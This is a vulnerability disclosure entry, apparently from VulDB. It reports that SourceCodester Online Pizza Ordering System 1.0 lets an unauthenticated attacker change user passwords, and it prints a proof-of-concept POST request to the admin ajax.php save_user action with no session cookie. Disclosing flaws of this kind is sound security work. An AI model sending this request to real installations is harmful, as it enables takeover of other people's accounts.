| Title | SOURCECODESTER ONLINE PIZZA ORDERING SYSTEM 1.0 Unauthorized Password Modification |
|---|
| Description | SOURCECODESTER ONLINE PIZZA ORDERING SYSTEM 1.0 has an Unauthorized Password Modification vulnerability, the vulnerability is due to access control weakness. Remote and unauthenticated attacker can change the password directly without login.
There is a poc below :
POST /php-opos/admin/ajax.php?action=save_user HTTP/1.1
*********************************(without cookie in header)
id=2&name=Staff&username=staff&password=abcdefg&type=2
Then the password will be changed to 'abcdefg' without authentication. |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html |
|---|
| User | WWesleywww (UID 43117) |
|---|
| Submission | 03/17/2023 08:33 (3 years ago) |
|---|
| Moderation | 03/17/2023 08:51 (17 minutes later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 223305 [SourceCodester Online Pizza Ordering System 1.0 Password Change ajax.php?action=save_user improper authentication] |
|---|
| Points | 20 |
|---|